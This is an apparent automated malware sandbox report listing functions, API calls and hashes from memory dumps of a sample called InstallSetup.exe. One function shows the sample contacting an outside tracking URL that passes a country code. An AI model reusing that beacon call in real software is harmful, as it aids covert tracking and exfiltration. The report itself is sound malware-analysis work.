__Getcoll.LIBCPMT ref: 0094512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0094513B

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: dd8937b88ea09c64a47bc7f84943854bd5141e898b8907a1ffc20e399ec2aea4
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: 5321CCB1819205AFDB10EFA0C495FECB7B0BF94311F10805AF085AB282DBB48944CB95

Function 009721C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0094DAD7,0094DAD7,00000002,0096ED35,00973951,00000000,?,00966A05,00000002,00000000,00000000,00000000,?,0094CF88,0094DAD7,00000004), ref: 009721CA
_free.LIBCMT ref: 009721FF
_free.LIBCMT ref: 00972226
SetLastError.KERNEL32(00000000,?,0094DAD7), ref: 00972233
SetLastError.KERNEL32(00000000,?,0094DAD7), ref: 0097223C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 53b45cc12c960163bf34710af4fe7734ddd4e6cd573c0534714f6eb9a5f181b8
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: AE01F937255B007B961A2B345C46F2A261DBBD1B727318538F42D922E3EEB4CD015129

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 00972141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0096A9EC,?,00000000,?,0096CDE6,0094247E,00000000,?,00451F20), ref: 00972145
_free.LIBCMT ref: 00972178
_free.LIBCMT ref: 009721A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 009721B9

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: e49e1d6f6162bf64975d044239f085b9d71e7853a2916bab20f8e1e837875877
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: 2FF0A937158A007BD6122734AC46B1A262DBBC2B72F618128F91C926E1FE6589025129

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 00957B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 009529A4: TlsGetValue.KERNEL32(?,?,00950DC2,00952ECF,00000000,?,00950DA0,?,?,?,00000000,?,00000000), ref: 009529AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 00957BB1

Part of subcall function 0096121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00961241
Part of subcall function 0096121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0096125A
Part of subcall function 0096121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 009612D0
Part of subcall function 0096121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 009612D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00957BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00957BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00957BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 00957BF1

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 74547d7e1623e745d1cbde0bab12f2672a67b4907bec516b87b701e66234d3f5
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 3AF0F63160021867CF15F7B79822A6EF6299FD1B12F04416AFC1053292EF249E0D87D1

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 0097A0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0097A0C4

Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9

_free.LIBCMT ref: 0097A0D6
_free.LIBCMT ref: 0097A0E8
_free.LIBCMT ref: 0097A0FA
_free.LIBCMT ref: 0097A10C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: f8e67f2867b4a83e6a8fc8c01a1b5f494c9157ce0788e9d9c2df0394740406e1
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: E8F06273509200BB8A60EB64E8C3D1A73DDBA80750B64CD55F00CD7B12CB71FC90965A

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 00971991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 009719AF

Part of subcall function 009736D1: HeapFree.KERNEL32(00000000,00000000,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?), ref: 009736E7
Part of subcall function 009736D1: GetLastError.KERNEL32(?,?,0097A35F,?,00000000,?,00000000,?,0097A603,?,00000007,?,?,0097A9F7,?,?), ref: 009736F9

_free.LIBCMT ref: 009719C1
_free.LIBCMT ref: 009719D4
_free.LIBCMT ref: 009719E5
_free.LIBCMT ref: 009719F6

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: bc4a2cbf2719e0671cda57d104ea38a064b54905e13c397da2cf6aac788c20aa
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: AAF05BB1D103106B9E617F24BC824043B64FF197227008266F40A977B3C774DAA3EB8E

Function 0095CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0095CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0095CF67
GetCurrentThread.KERNEL32 ref: 0095CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0095CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0095CF8C

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 6014519e8e57bc25ddbd25bdc8776ad3bc6cc4476c376c1eab93348b22c5c5df
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: D7F0A032201600DFC625EF22EA519BAB7B6AFC4712350450CFD8B06651CF21A94ED771

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 00942E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 00942E8E

Part of subcall function 00941321: _wcslen.LIBCMT ref: 00941328
Part of subcall function 00941321: _wcslen.LIBCMT ref: 00941344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 009430A1

Strings

&cc=DE, xrefs: 0094301B, 00943021, 0094307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 00942EBE, 00942FEA, 00943059

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: c9b8111cddffb2aaee452969f8c72e96a1449808d3129d18965e443c5590691d
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 1D515395A55344A8E320EFB0BC56F723378FF58712F10543AE518CB2B2E7B19944871E

Function 00968937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0096896A
__IsNonwritableInCurrentImage.LIBCMT ref: 00968A23

Strings

csm, xrefs: 00968A0D
fB, xrefs: 00968A15, 00968A1E, 00968A2F

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 6ab9b9e5c33df797c14dbeace9a2a2b74dc7f2c021f5ce2a8912ea7cf0da84d1
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 84410A34A00248DBCF10DF68C845AAF7BB5AF45328F148266ED156B392DB36DD05CF91

Function 0096F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\InstallSetup.exe,00000104), ref: 0096F9BA
_free.LIBCMT ref: 0096FA85
_free.LIBCMT ref: 0096FA8F

Strings

C:\Users\user\Desktop\InstallSetup.exe, xrefs: 0096F9B1, 0096F9B8, 0096F9E7, 0096FA1F

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\InstallSetup.exe
API String ID: 2506810119-1732551550
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 4c3ed202eb807a2d540da1418d029eaf51d574bcacac8cd522b7de5f58433f16
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 40317071A00258EFDB21DFD9ED95E9EBBFCEF99710B104076E80897212E6749E40CB94

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\InstallSetup.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\InstallSetup.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\InstallSetup.exe
API String ID: 2506810119-1732551550
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0094C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0094C8DE

Strings

ios_base::eofbit set, xrefs: 0094C8B0
ios_base::badbit set, xrefs: 0094C8A1, 0094C8C1
ios_base::failbit set, xrefs: 0094C8AB

Memory Dump Source

Source File: 00000000.00000002.3920122138.0000000000940000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_940000_InstallSetup.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: e995514250175a49ea6453aa01844c5431b252f0e9a07f8f10311f1957ddae18
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 5AF02BF28012086FCB84E654CC42FEE33989B55311F14806AED52AB183EA689D05CBA4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.3919786935.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_InstallSetup.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
